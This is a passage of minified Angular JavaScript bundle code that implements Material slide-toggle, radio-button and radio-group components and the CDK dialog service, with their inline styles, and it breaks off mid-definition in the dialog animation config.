L1e{constructor(a,e){this.source=a,this.checked=e}}const z1e=mp(kd(Dl(Jc(class{constructor(t){this._elementRef=t}}))));let W1e=(()=>{class t extends z1e{constructor(e,i,n,r,c,d,T){super(e),this._focusMonitor=i,this._changeDetectorRef=n,this.defaults=c,this._onChange=k=>{},this._onTouched=()=>{},this._required=!1,this._checked=!1,this.name=null,this.labelPosition="after",this.ariaLabel=null,this.ariaLabelledby=null,this.change=new Tt,this.toggleChange=new Tt,this.tabIndex=parseInt(r)||0,this.color=this.defaultColor=c.color||"accent",this._noopAnimations="NoopAnimations"===d,this.id=this._uniqueId=`${T}${++O1e}`}get required(){return this._required}set required(e){this._required=wi(e)}get checked(){return this._checked}set checked(e){this._checked=wi(e),this._changeDetectorRef.markForCheck()}get inputId(){return`${this.id||this._uniqueId}-input`}ngAfterContentInit(){this._focusMonitor.monitor(this._elementRef,!0).subscribe(e=>{"keyboard"===e||"program"===e?this._focused=!0:e||Promise.resolve().then(()=>{this._focused=!1,this._onTouched(),this._changeDetectorRef.markForCheck()})})}ngOnDestroy(){this._focusMonitor.stopMonitoring(this._elementRef)}writeValue(e){this.checked=!!e}registerOnChange(e){this._onChange=e}registerOnTouched(e){this._onTouched=e}setDisabledState(e){this.disabled=e,this._changeDetectorRef.markForCheck()}toggle(){this.checked=!this.checked,this._onChange(this.checked)}_emitChangeEvent(){this._onChange(this.checked),this.change.emit(this._createChangeEvent(this.checked))}}return t.\u0275fac=function(e){pd()},t.\u0275dir=Ot({type:t,inputs:{name:"name",id:"id",labelPosition:"labelPosition",ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],ariaDescribedby:["aria-describedby","ariaDescribedby"],required:"required",checked:"checked"},outputs:{change:"change",toggleChange:"toggleChange"},features:[ci]}),t})(),vg=(()=>{class t extends W1e{constructor(e,i,n,r,c,d){super(e,i,n,r,c,d,"mat-slide-toggle-")}_createChangeEvent(e){return new L1e(this,e)}_onChangeEvent(e){e.stopPropagation(),this.toggleChange.emit(),this.defaults.disableToggleValue?this._inputElement.nativeElement.checked=this.checked:(this.checked=this._inputElement.nativeElement.checked,this._emitChangeEvent())}_onInputClick(e){e.stopPropagation()}focus(e,i){i?this._focusMonitor.focusVia(this._inputElement,i,e):this._inputElement.nativeElement.focus(e)}_onLabelTextChange(){this._changeDetectorRef.detectChanges()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(js),Ee(Ma),Vr("tabindex"),Ee(P1e),Ee(ir,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-slide-toggle"]],viewQuery:function(e,i){if(1&e&&Mi(R1e,5),2&e){let n;Vt(n=Bt())&&(i._inputElement=n.first)}},hostAttrs:[1,"mat-slide-toggle"],hostVars:13,hostBindings:function(e,i){2&e&&(Gs("id",i.id),Rt("tabindex",null)("aria-label",null)("aria-labelledby",null)("name",null),Ct("mat-checked",i.checked)("mat-disabled",i.disabled)("mat-slide-toggle-label-before","before"==i.labelPosition)("_mat-animation-noopable",i._noopAnimations))},inputs:{disabled:"disabled",disableRipple:"disableRipple",color:"color",tabIndex:"tabIndex"},exportAs:["matSlideToggle"],features:[ki([N1e]),ci],ngContentSelectors:k1e,decls:14,vars:20,consts:[[1,"mat-slide-toggle-label"],["label",""],[1,"mat-slide-toggle-bar"],["type","checkbox","role","switch",1,"mat-slide-toggle-input","cdk-visually-hidden",3,"id","required","tabIndex","checked","disabled","change","click"],["input",""],[1,"mat-slide-toggle-thumb-container"],[1,"mat-slide-toggle-thumb"],["mat-ripple","",1,"mat-slide-toggle-ripple","mat-focus-indicator",3,"matRippleTrigger","matRippleDisabled","matRippleCentered","matRippleRadius","matRippleAnimation"],[1,"mat-ripple-element","mat-slide-toggle-persistent-ripple"],[1,"mat-slide-toggle-content",3,"cdkObserveContent"],["labelContent",""],[2,"display","none"]],template:function(e,i){if(1&e&&(Jn(),m(0,"label",0,1)(2,"span",2)(3,"input",3,4),he("change",function(r){return i._onChangeEvent(r)})("click",function(r){return i._onInputClick(r)}),u(),m(5,"span",5),it(6,"span",6),m(7,"span",7),it(8,"span",8),u()()(),m(9,"span",9,10),he("cdkObserveContent",function(){return i._onLabelTextChange()}),m(11,"span",11),s(12,"\xa0"),u(),va(13),u()()),2&e){const n=Ti(1),r=Ti(10);Rt("for",i.inputId),C(2),Ct("mat-slide-toggle-bar-no-side-margin",!r.textContent||!r.textContent.trim()),C(1),V("id",i.inputId)("required",i.required)("tabIndex",i.tabIndex)("checked",i.checked)("disabled",i.disabled),Rt("name",i.name)("aria-checked",i.checked)("aria-label",i.ariaLabel)("aria-labelledby",i.ariaLabelledby)("aria-describedby",i.ariaDescribedby),C(4),V("matRippleTrigger",n)("matRippleDisabled",i.disableRipple||i.disabled)("matRippleCentered",!0)("matRippleRadius",20)("matRippleAnimation",fr(18,S1e,i._noopAnimations?0:150))}},dependencies:[xl,P3],styles:['.mat-slide-toggle{display:inline-block;height:24px;max-width:100%;line-height:24px;white-space:nowrap;outline:none;-webkit-tap-highlight-color:rgba(0,0,0,0)}.mat-slide-toggle.mat-checked .mat-slide-toggle-thumb-container{transform:translate3d(16px, 0, 0)}[dir=rtl] .mat-slide-toggle.mat-checked .mat-slide-toggle-thumb-container{transform:translate3d(-16px, 0, 0)}.mat-slide-toggle.mat-disabled{opacity:.38}.mat-slide-toggle.mat-disabled .mat-slide-toggle-label,.mat-slide-toggle.mat-disabled .mat-slide-toggle-thumb-container{cursor:default}.mat-slide-toggle-label{-webkit-user-select:none;user-select:none;display:flex;flex:1;flex-direction:row;align-items:center;height:inherit;cursor:pointer}.mat-slide-toggle-content{white-space:nowrap;overflow:hidden;text-overflow:ellipsis}.mat-slide-toggle-label-before .mat-slide-toggle-label{order:1}.mat-slide-toggle-label-before .mat-slide-toggle-bar{order:2}[dir=rtl] .mat-slide-toggle-label-before .mat-slide-toggle-bar,.mat-slide-toggle-bar{margin-right:8px;margin-left:0}[dir=rtl] .mat-slide-toggle-bar,.mat-slide-toggle-label-before .mat-slide-toggle-bar{margin-left:8px;margin-right:0}.mat-slide-toggle-bar-no-side-margin{margin-left:0;margin-right:0}.mat-slide-toggle-thumb-container{position:absolute;z-index:1;width:20px;height:20px;top:-3px;left:0;transform:translate3d(0, 0, 0);transition:all 80ms linear;transition-property:transform}._mat-animation-noopable .mat-slide-toggle-thumb-container{transition:none}[dir=rtl] .mat-slide-toggle-thumb-container{left:auto;right:0}.mat-slide-toggle-thumb{height:20px;width:20px;border-radius:50%;display:block}.mat-slide-toggle-bar{position:relative;width:36px;height:14px;flex-shrink:0;border-radius:8px}.mat-slide-toggle-input{bottom:0;left:10px}[dir=rtl] .mat-slide-toggle-input{left:auto;right:10px}.mat-slide-toggle-bar,.mat-slide-toggle-thumb{transition:all 80ms linear;transition-property:background-color;transition-delay:50ms}._mat-animation-noopable .mat-slide-toggle-bar,._mat-animation-noopable .mat-slide-toggle-thumb{transition:none}.mat-slide-toggle .mat-slide-toggle-ripple{position:absolute;top:calc(50% - 20px);left:calc(50% - 20px);height:40px;width:40px;z-index:1;pointer-events:none}.mat-slide-toggle .mat-slide-toggle-ripple .mat-ripple-element:not(.mat-slide-toggle-persistent-ripple){opacity:.12}.mat-slide-toggle-persistent-ripple{width:100%;height:100%;transform:none}.mat-slide-toggle-bar:hover .mat-slide-toggle-persistent-ripple{opacity:.04}.mat-slide-toggle:not(.mat-disabled).cdk-keyboard-focused .mat-slide-toggle-persistent-ripple{opacity:.12}.mat-slide-toggle-persistent-ripple,.mat-slide-toggle.mat-disabled .mat-slide-toggle-bar:hover .mat-slide-toggle-persistent-ripple{opacity:0}@media(hover: none){.mat-slide-toggle-bar:hover .mat-slide-toggle-persistent-ripple{display:none}}.mat-slide-toggle-input:focus~.mat-slide-toggle-thumb-container .mat-focus-indicator::before{content:""}.cdk-high-contrast-active .mat-slide-toggle-thumb,.cdk-high-contrast-active .mat-slide-toggle-bar{border:1px solid}'],encapsulation:2,changeDetection:0}),t})(),iV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})(),aV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[iV,Pd,la,$y,iV,la]}),t})();const B1e=["input"],H1e=function(t){return{enterDuration:t}},U1e=["*"],q1e=new ni("mat-radio-default-options",{providedIn:"root",factory:function G1e(){return{color:"accent"}}});let nV=0;const j1e={provide:Ls,useExisting:ja(()=>sV),multi:!0};class oV{constructor(a,e){this.source=a,this.value=e}}const rV=new ni("MatRadioGroup");let Q1e=(()=>{class t{constructor(e){this._changeDetector=e,this._value=null,this._name="mat-radio-group-"+nV++,this._selected=null,this._isInitialized=!1,this._labelPosition="after",this._disabled=!1,this._required=!1,this._controlValueAccessorChangeFn=()=>{},this.onTouched=()=>{},this.change=new Tt}get name(){return this._name}set name(e){this._name=e,this._updateRadioButtonNames()}get labelPosition(){return this._labelPosition}set labelPosition(e){this._labelPosition="before"===e?"before":"after",this._markRadiosForCheck()}get value(){return this._value}set value(e){this._value!==e&&(this._value=e,this._updateSelectedRadioFromValue(),this._checkSelectedRadioButton())}_checkSelectedRadioButton(){this._selected&&!this._selected.checked&&(this._selected.checked=!0)}get selected(){return this._selected}set selected(e){this._selected=e,this.value=e?e.value:null,this._checkSelectedRadioButton()}get disabled(){return this._disabled}set disabled(e){this._disabled=wi(e),this._markRadiosForCheck()}get required(){return this._required}set required(e){this._required=wi(e),this._markRadiosForCheck()}ngAfterContentInit(){this._isInitialized=!0}_touch(){this.onTouched&&this.onTouched()}_updateRadioButtonNames(){this._radios&&this._radios.forEach(e=>{e.name=this.name,e._markForCheck()})}_updateSelectedRadioFromValue(){this._radios&&(null===this._selected||this._selected.value!==this._value)&&(this._selected=null,this._radios.forEach(i=>{i.checked=this.value===i.value,i.checked&&(this._selected=i)}))}_emitChangeEvent(){this._isInitialized&&this.change.emit(new oV(this._selected,this._value))}_markRadiosForCheck(){this._radios&&this._radios.forEach(e=>e._markForCheck())}writeValue(e){this.value=e,this._changeDetector.markForCheck()}registerOnChange(e){this._controlValueAccessorChangeFn=e}registerOnTouched(e){this.onTouched=e}setDisabledState(e){this.disabled=e,this._changeDetector.markForCheck()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma))},t.\u0275dir=Ot({type:t,inputs:{color:"color",name:"name",labelPosition:"labelPosition",value:"value",selected:"selected",disabled:"disabled",required:"required"},outputs:{change:"change"}}),t})(),sV=(()=>{class t extends Q1e{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["mat-radio-group"]],contentQueries:function(e,i,n){if(1&e&&ha(n,cV,5),2&e){let r;Vt(r=Bt())&&(i._radios=r)}},hostAttrs:["role","radiogroup",1,"mat-radio-group"],exportAs:["matRadioGroup"],features:[ki([j1e,{provide:rV,useExisting:t}]),ci]}),t})();class $1e{constructor(a){this._elementRef=a}}const K1e=Dl(mp($1e));let X1e=(()=>{class t extends K1e{constructor(e,i,n,r,c,d,T,k){super(i),this._changeDetector=n,this._focusMonitor=r,this._radioDispatcher=c,this._providerOverride=T,this._uniqueId="mat-radio-"+ ++nV,this.id=this._uniqueId,this.change=new Tt,this._checked=!1,this._value=null,this._removeUniqueSelectionListener=()=>{},this.radioGroup=e,this._noopAnimations="NoopAnimations"===d,k&&(this.tabIndex=Uo(k,0)),this._removeUniqueSelectionListener=c.listen((q,Y)=>{q!==this.id&&Y===this.name&&(this.checked=!1)})}get checked(){return this._checked}set checked(e){const i=wi(e);this._checked!==i&&(this._checked=i,i&&this.radioGroup&&this.radioGroup.value!==this.value?this.radioGroup.selected=this:!i&&this.radioGroup&&this.radioGroup.value===this.value&&(this.radioGroup.selected=null),i&&this._radioDispatcher.notify(this.id,this.name),this._changeDetector.markForCheck())}get value(){return this._value}set value(e){this._value!==e&&(this._value=e,null!==this.radioGroup&&(this.checked||(this.checked=this.radioGroup.value===e),this.checked&&(this.radioGroup.selected=this)))}get labelPosition(){return this._labelPosition||this.radioGroup&&this.radioGroup.labelPosition||"after"}set labelPosition(e){this._labelPosition=e}get disabled(){return this._disabled||null!==this.radioGroup&&this.radioGroup.disabled}set disabled(e){this._setDisabled(wi(e))}get required(){return this._required||this.radioGroup&&this.radioGroup.required}set required(e){this._required=wi(e)}get color(){return this._color||this.radioGroup&&this.radioGroup.color||this._providerOverride&&this._providerOverride.color||"accent"}set color(e){this._color=e}get inputId(){return`${this.id||this._uniqueId}-input`}focus(e,i){i?this._focusMonitor.focusVia(this._inputElement,i,e):this._inputElement.nativeElement.focus(e)}_markForCheck(){this._changeDetector.markForCheck()}ngOnInit(){this.radioGroup&&(this.checked=this.radioGroup.value===this._value,this.checked&&(this.radioGroup.selected=this),this.name=this.radioGroup.name)}ngDoCheck(){this._updateTabIndex()}ngAfterViewInit(){this._updateTabIndex(),this._focusMonitor.monitor(this._elementRef,!0).subscribe(e=>{!e&&this.radioGroup&&this.radioGroup._touch()})}ngOnDestroy(){this._focusMonitor.stopMonitoring(this._elementRef),this._removeUniqueSelectionListener()}_emitChangeEvent(){this.change.emit(new oV(this,this._value))}_isRippleDisabled(){return this.disableRipple||this.disabled}_onInputClick(e){e.stopPropagation()}_onInputInteraction(e){if(e.stopPropagation(),!this.checked&&!this.disabled){const i=this.radioGroup&&this.value!==this.radioGroup.value;this.checked=!0,this._emitChangeEvent(),this.radioGroup&&(this.radioGroup._controlValueAccessorChangeFn(this.value),i&&this.radioGroup._emitChangeEvent())}}_setDisabled(e){this._disabled!==e&&(this._disabled=e,this._changeDetector.markForCheck())}_updateTabIndex(){var e;const i=this.radioGroup;let n;if(n=i&&i.selected&&!this.disabled?i.selected===this?this.tabIndex:-1:this.tabIndex,n!==this._previousTabIndex){const r=null===(e=this._inputElement)||void 0===e?void 0:e.nativeElement;r&&(r.setAttribute("tabindex",n+""),this._previousTabIndex=n)}}}return t.\u0275fac=function(e){pd()},t.\u0275dir=Ot({type:t,viewQuery:function(e,i){if(1&e&&Mi(B1e,5),2&e){let n;Vt(n=Bt())&&(i._inputElement=n.first)}},inputs:{id:"id",name:"name",ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],ariaDescribedby:["aria-describedby","ariaDescribedby"],checked:"checked",value:"value",labelPosition:"labelPosition",disabled:"disabled",required:"required",color:"color"},outputs:{change:"change"},features:[ci]}),t})(),cV=(()=>{class t extends X1e{constructor(e,i,n,r,c,d,T,k){super(e,i,n,r,c,d,T,k)}}return t.\u0275fac=function(e){return new(e||t)(Ee(rV,8),Ee(mi),Ee(Ma),Ee(js),Ee(aw),Ee(ir,8),Ee(q1e,8),Vr("tabindex"))},t.\u0275cmp=Wt({type:t,selectors:[["mat-radio-button"]],hostAttrs:[1,"mat-radio-button"],hostVars:17,hostBindings:function(e,i){1&e&&he("focus",function(){return i._inputElement.nativeElement.focus()}),2&e&&(Rt("tabindex",null)("id",i.id)("aria-label",null)("aria-labelledby",null)("aria-describedby",null),Ct("mat-radio-checked",i.checked)("mat-radio-disabled",i.disabled)("_mat-animation-noopable",i._noopAnimations)("mat-primary","primary"===i.color)("mat-accent","accent"===i.color)("mat-warn","warn"===i.color))},inputs:{disableRipple:"disableRipple",tabIndex:"tabIndex"},exportAs:["matRadioButton"],features:[ci],ngContentSelectors:U1e,decls:13,vars:19,consts:[[1,"mat-radio-label"],["label",""],[1,"mat-radio-container"],[1,"mat-radio-outer-circle"],[1,"mat-radio-inner-circle"],["type","radio",1,"mat-radio-input",3,"id","checked","disabled","required","change","click"],["input",""],["mat-ripple","",1,"mat-radio-ripple","mat-focus-indicator",3,"matRippleTrigger","matRippleDisabled","matRippleCentered","matRippleRadius","matRippleAnimation"],[1,"mat-ripple-element","mat-radio-persistent-ripple"],[1,"mat-radio-label-content"],[2,"display","none"]],template:function(e,i){if(1&e&&(Jn(),m(0,"label",0,1)(2,"span",2),it(3,"span",3)(4,"span",4),m(5,"input",5,6),he("change",function(r){return i._onInputInteraction(r)})("click",function(r){return i._onInputClick(r)}),u(),m(7,"span",7),it(8,"span",8),u()(),m(9,"span",9)(10,"span",10),s(11,"\xa0"),u(),va(12),u()()),2&e){const n=Ti(1);Rt("for",i.inputId),C(5),V("id",i.inputId)("checked",i.checked)("disabled",i.disabled)("required",i.required),Rt("name",i.name)("value",i.value)("aria-label",i.ariaLabel)("aria-labelledby",i.ariaLabelledby)("aria-describedby",i.ariaDescribedby),C(2),V("matRippleTrigger",n)("matRippleDisabled",i._isRippleDisabled())("matRippleCentered",!0)("matRippleRadius",20)("matRippleAnimation",fr(17,H1e,i._noopAnimations?0:150)),C(2),Ct("mat-radio-label-before","before"==i.labelPosition)}},dependencies:[xl],styles:['.mat-radio-button{display:inline-block;-webkit-tap-highlight-color:rgba(0,0,0,0);outline:0}.mat-radio-label{-webkit-user-select:none;user-select:none;cursor:pointer;display:inline-flex;align-items:center;white-space:nowrap;vertical-align:middle;width:100%}.mat-radio-container{box-sizing:border-box;display:inline-block;position:relative;width:20px;height:20px;flex-shrink:0}.mat-radio-outer-circle{box-sizing:border-box;display:block;height:20px;left:0;position:absolute;top:0;transition:border-color ease 280ms;width:20px;border-width:2px;border-style:solid;border-radius:50%}._mat-animation-noopable .mat-radio-outer-circle{transition:none}.mat-radio-inner-circle{border-radius:50%;box-sizing:border-box;display:block;height:20px;left:0;position:absolute;top:0;opacity:0;transition:transform ease 280ms,background-color ease 280ms,opacity linear 1ms 280ms;width:20px;transform:scale(0.001);-webkit-print-color-adjust:exact;color-adjust:exact}.mat-radio-checked .mat-radio-inner-circle{transform:scale(0.5);opacity:1;transition:transform ease 280ms,background-color ease 280ms}.cdk-high-contrast-active .mat-radio-checked .mat-radio-inner-circle{border:solid 10px}._mat-animation-noopable .mat-radio-inner-circle{transition:none}.mat-radio-label-content{-webkit-user-select:auto;user-select:auto;display:inline-block;order:0;line-height:inherit;padding-left:8px;padding-right:0}[dir=rtl] .mat-radio-label-content{padding-right:8px;padding-left:0}.mat-radio-label-content.mat-radio-label-before{order:-1;padding-left:0;padding-right:8px}[dir=rtl] .mat-radio-label-content.mat-radio-label-before{padding-right:0;padding-left:8px}.mat-radio-disabled,.mat-radio-disabled .mat-radio-label{cursor:default}.mat-radio-button .mat-radio-ripple{position:absolute;left:calc(50% - 20px);top:calc(50% - 20px);height:40px;width:40px;z-index:1;pointer-events:none}.mat-radio-button .mat-radio-ripple .mat-ripple-element:not(.mat-radio-persistent-ripple){opacity:.16}.mat-radio-persistent-ripple{width:100%;height:100%;transform:none;top:0;left:0}.mat-radio-container:hover .mat-radio-persistent-ripple{opacity:.04}.mat-radio-button:not(.mat-radio-disabled).cdk-keyboard-focused .mat-radio-persistent-ripple,.mat-radio-button:not(.mat-radio-disabled).cdk-program-focused .mat-radio-persistent-ripple{opacity:.12}.mat-radio-persistent-ripple,.mat-radio-disabled .mat-radio-container:hover .mat-radio-persistent-ripple{opacity:0}@media(hover: none){.mat-radio-container:hover .mat-radio-persistent-ripple{display:none}}.mat-radio-input{opacity:0;position:absolute;top:0;left:0;margin:0;width:100%;height:100%;cursor:inherit;z-index:-1}.mat-radio-input:focus~.mat-focus-indicator::before{content:""}.cdk-high-contrast-active .mat-radio-disabled{opacity:.5}'],encapsulation:2,changeDetection:0}),t})(),_8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Pd,la,la]}),t})();function Y1e(t,a){}class oA{constructor(){this.role="dialog",this.panelClass="",this.hasBackdrop=!0,this.backdropClass="",this.disableClose=!1,this.width="",this.height="",this.data=null,this.ariaDescribedBy=null,this.ariaLabelledBy=null,this.ariaLabel=null,this.ariaModal=!0,this.autoFocus="first-tabbable",this.restoreFocus=!0,this.closeOnNavigation=!0,this.closeOnDestroy=!0}}let lV=(()=>{class t extends eA{constructor(e,i,n,r,c,d,T,k){super(),this._elementRef=e,this._focusTrapFactory=i,this._config=r,this._interactivityChecker=c,this._ngZone=d,this._overlayRef=T,this._focusMonitor=k,this._elementFocusedBeforeDialogWasOpened=null,this._closeInteractionType=null,this.attachDomPortal=q=>{this._portalOutlet.hasAttached();const Y=this._portalOutlet.attachDomPortal(q);return this._contentAttached(),Y},this._ariaLabelledBy=this._config.ariaLabelledBy||null,this._document=n}_contentAttached(){this._initializeFocusTrap(),this._handleBackdropClicks(),this._captureInitialFocus()}_captureInitialFocus(){this._trapFocus()}ngOnDestroy(){this._restoreFocus()}attachComponentPortal(e){this._portalOutlet.hasAttached();const i=this._portalOutlet.attachComponentPortal(e);return this._contentAttached(),i}attachTemplatePortal(e){this._portalOutlet.hasAttached();const i=this._portalOutlet.attachTemplatePortal(e);return this._contentAttached(),i}_recaptureFocus(){this._containsFocus()||this._trapFocus()}_forceFocus(e,i){this._interactivityChecker.isFocusable(e)||(e.tabIndex=-1,this._ngZone.runOutsideAngular(()=>{const n=()=>{e.removeEventListener("blur",n),e.removeEventListener("mousedown",n),e.removeAttribute("tabindex")};e.addEventListener("blur",n),e.addEventListener("mousedown",n)})),e.focus(i)}_focusByCssSelector(e,i){let n=this._elementRef.nativeElement.querySelector(e);n&&this._forceFocus(n,i)}_trapFocus(){const e=this._elementRef.nativeElement;switch(this._config.autoFocus){case!1:case"dialog":this._containsFocus()||e.focus();break;case!0:case"first-tabbable":this._focusTrap.focusInitialElementWhenReady().then(i=>{i||this._focusDialogContainer()});break;case"first-heading":this._focusByCssSelector('h1, h2, h3, h4, h5, h6, [role="heading"]');break;default:this._focusByCssSelector(this._config.autoFocus)}}_restoreFocus(){const e=this._config.restoreFocus;let i=null;if("string"==typeof e?i=this._document.querySelector(e):"boolean"==typeof e?i=e?this._elementFocusedBeforeDialogWasOpened:null:e&&(i=e),this._config.restoreFocus&&i&&"function"==typeof i.focus){const n=g3(),r=this._elementRef.nativeElement;(!n||n===this._document.body||n===r||r.contains(n))&&(this._focusMonitor?(this._focusMonitor.focusVia(i,this._closeInteractionType),this._closeInteractionType=null):i.focus())}this._focusTrap&&this._focusTrap.destroy()}_focusDialogContainer(){this._elementRef.nativeElement.focus&&this._elementRef.nativeElement.focus()}_containsFocus(){const e=this._elementRef.nativeElement,i=g3();return e===i||e.contains(i)}_initializeFocusTrap(){this._focusTrap=this._focusTrapFactory.create(this._elementRef.nativeElement),this._document&&(this._elementFocusedBeforeDialogWasOpened=g3())}_handleBackdropClicks(){this._overlayRef.backdropClick().subscribe(()=>{this._config.disableClose&&this._recaptureFocus()})}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(z3),Ee(ga,8),Ee(oA),Ee(Ky),Ee(qi),Ee(nb),Ee(js))},t.\u0275cmp=Wt({type:t,selectors:[["cdk-dialog-container"]],viewQuery:function(e,i){if(1&e&&Mi(Cu,7),2&e){let n;Vt(n=Bt())&&(i._portalOutlet=n.first)}},hostAttrs:["tabindex","-1",1,"cdk-dialog-container"],hostVars:6,hostBindings:function(e,i){2&e&&Rt("id",i._config.id||null)("role",i._config.role)("aria-modal",i._config.ariaModal)("aria-labelledby",i._config.ariaLabel?null:i._ariaLabelledBy)("aria-label",i._config.ariaLabel)("aria-describedby",i._config.ariaDescribedBy||null)},features:[ci],decls:1,vars:0,consts:[["cdkPortalOutlet",""]],template:function(e,i){1&e&&ne(0,Y1e,0,0,"ng-template",0)},dependencies:[Cu],styles:[".cdk-dialog-container{display:block;width:100%;height:100%;min-height:inherit;max-height:inherit}"],encapsulation:2}),t})();class g8{constructor(a,e){this.overlayRef=a,this.config=e,this.closed=new J,this.disableClose=e.disableClose,this.backdropClick=a.backdropClick(),this.keydownEvents=a.keydownEvents(),this.outsidePointerEvents=a.outsidePointerEvents(),this.id=e.id,this.keydownEvents.subscribe(i=>{27===i.keyCode&&!this.disableClose&&!Zr(i)&&(i.preventDefault(),this.close(void 0,{focusOrigin:"keyboard"}))}),this.backdropClick.subscribe(()=>{this.disableClose||this.close(void 0,{focusOrigin:"mouse"})})}close(a,e){if(this.containerInstance){const i=this.closed;this.containerInstance._closeInteractionType=(null==e?void 0:e.focusOrigin)||"program",this.overlayRef.dispose(),i.next(a),i.complete(),this.componentInstance=this.containerInstance=null}}updatePosition(){return this.overlayRef.updatePosition(),this}updateSize(a="",e=""){return this.overlayRef.updateSize({width:a,height:e}),this}addPanelClass(a){return this.overlayRef.addPanelClass(a),this}removePanelClass(a){return this.overlayRef.removePanelClass(a),this}}const dV=new ni("DialogScrollStrategy"),J1e=new ni("DialogData"),Z1e=new ni("DefaultDialogConfig"),t2e={provide:dV,deps:[vs],useFactory:function e2e(t){return()=>t.scrollStrategies.block()}};let i2e=0,mV=(()=>{class t{constructor(e,i,n,r,c,d){this._overlay=e,this._injector=i,this._defaultOptions=n,this._parentDialog=r,this._overlayContainer=c,this._openDialogsAtThisLevel=[],this._afterAllClosedAtThisLevel=new J,this._afterOpenedAtThisLevel=new J,this._ariaHiddenElements=new Map,this.afterAllClosed=sp(()=>this.openDialogs.length?this._getAfterAllClosed():this._getAfterAllClosed().pipe(Ro(void 0))),this._scrollStrategy=d}get openDialogs(){return this._parentDialog?this._parentDialog.openDialogs:this._openDialogsAtThisLevel}get afterOpened(){return this._parentDialog?this._parentDialog.afterOpened:this._afterOpenedAtThisLevel}open(e,i){const n=this._defaultOptions||new oA;(i=Object.assign(Object.assign({},n),i)).id=i.id||"cdk-dialog-"+i2e++,i.id&&this.getDialogById(i.id);const r=this._getOverlayConfig(i),c=this._overlay.create(r),d=new g8(c,i),T=this._attachContainer(c,d,i);return d.containerInstance=T,this._attachDialogContent(e,d,T,i),this.openDialogs.length||this._hideNonDialogContentFromAssistiveTechnology(),this.openDialogs.push(d),d.closed.subscribe(()=>this._removeOpenDialog(d,!0)),this.afterOpened.next(d),d}closeAll(){C8(this.openDialogs,e=>e.close())}getDialogById(e){return this.openDialogs.find(i=>i.id===e)}ngOnDestroy(){C8(this._openDialogsAtThisLevel,e=>{!1===e.config.closeOnDestroy&&this._removeOpenDialog(e,!1)}),C8(this._openDialogsAtThisLevel,e=>e.close()),this._afterAllClosedAtThisLevel.complete(),this._afterOpenedAtThisLevel.complete(),this._openDialogsAtThisLevel=[]}_getOverlayConfig(e){const i=new bg({positionStrategy:e.positionStrategy||this._overlay.position().global().centerHorizontally().centerVertically(),scrollStrategy:e.scrollStrategy||this._scrollStrategy(),panelClass:e.panelClass,hasBackdrop:e.hasBackdrop,direction:e.direction,minWidth:e.minWidth,minHeight:e.minHeight,maxWidth:e.maxWidth,maxHeight:e.maxHeight,width:e.width,height:e.height,disposeOnNavigation:e.closeOnNavigation});return e.backdropClass&&(i.backdropClass=e.backdropClass),i}_attachContainer(e,i,n){var r;const c=n.injector||(null===(r=n.viewContainerRef)||void 0===r?void 0:r.injector),d=[{provide:oA,useValue:n},{provide:g8,useValue:i},{provide:nb,useValue:e}];let T;n.container?"function"==typeof n.container?T=n.container:(T=n.container.type,d.push(...n.container.providers(n))):T=lV;const k=new fp(T,n.viewContainerRef,Ko.create({parent:c||this._injector,providers:d}),n.componentFactoryResolver);return e.attach(k).instance}_attachDialogContent(e,i,n,r){if(e instanceof ho){const c=this._createInjector(r,i,n,void 0);let d={$implicit:r.data,dialogRef:i};r.templateContext&&(d=Object.assign(Object.assign({},d),"function"==typeof r.templateContext?r.templateContext():r.templateContext)),n.attachTemplatePortal(new Mm(e,null,d,c))}else{const c=this._createInjector(r,i,n,this._injector),d=n.attachComponentPortal(new fp(e,r.viewContainerRef,c,r.componentFactoryResolver));i.componentInstance=d.instance}}_createInjector(e,i,n,r){var c;const d=e.injector||(null===(c=e.viewContainerRef)||void 0===c?void 0:c.injector),T=[{provide:J1e,useValue:e.data},{provide:g8,useValue:i}];return e.providers&&("function"==typeof e.providers?T.push(...e.providers(i,e,n)):T.push(...e.providers)),e.direction&&(!d||!d.get(Cr,null,Da.Optional))&&T.push({provide:Cr,useValue:{value:e.direction,change:Bi()}}),Ko.create({parent:d||r,providers:T})}_removeOpenDialog(e,i){const n=this.openDialogs.indexOf(e);n>-1&&(this.openDialogs.splice(n,1),this.openDialogs.length||(this._ariaHiddenElements.forEach((r,c)=>{r?c.setAttribute("aria-hidden",r):c.removeAttribute("aria-hidden")}),this._ariaHiddenElements.clear(),i&&this._getAfterAllClosed().next()))}_hideNonDialogContentFromAssistiveTechnology(){const e=this._overlayContainer.getContainerElement();if(e.parentElement){const i=e.parentElement.children;for(let n=i.length-1;n>-1;n--){const r=i[n];r!==e&&"SCRIPT"!==r.nodeName&&"STYLE"!==r.nodeName&&!r.hasAttribute("aria-live")&&(this._ariaHiddenElements.set(r,r.getAttribute("aria-hidden")),r.setAttribute("aria-hidden","true"))}}}_getAfterAllClosed(){const e=this._parentDialog;return e?e._getAfterAllClosed():this._afterAllClosedAtThisLevel}}return t.\u0275fac=function(e){return new(e||t)(At(vs),At(Ko),At(Z1e,8),At(t,12),At(ob),At(dV))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();function C8(t,a){let e=t.length;for(;e--;)a(t[e])}let a2e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[mV,t2e],imports:[bu,yu,Xy,yu]}),t})();function n2e(t,a){}const B1={params:{enterAnimationDuration:"150ms",exitAnimationDuration:"75ms"}},o2e={dialogContainer:ar("dialogContainer",[sn("void, exit",zi({opacity:0,transform:"scale(0.7)"})),sn("enter",zi({transform:"none"})),gn("* => enter",$P([En("{{enterAnimationDuration}} cubic-bezier(0, 0, 0.2, 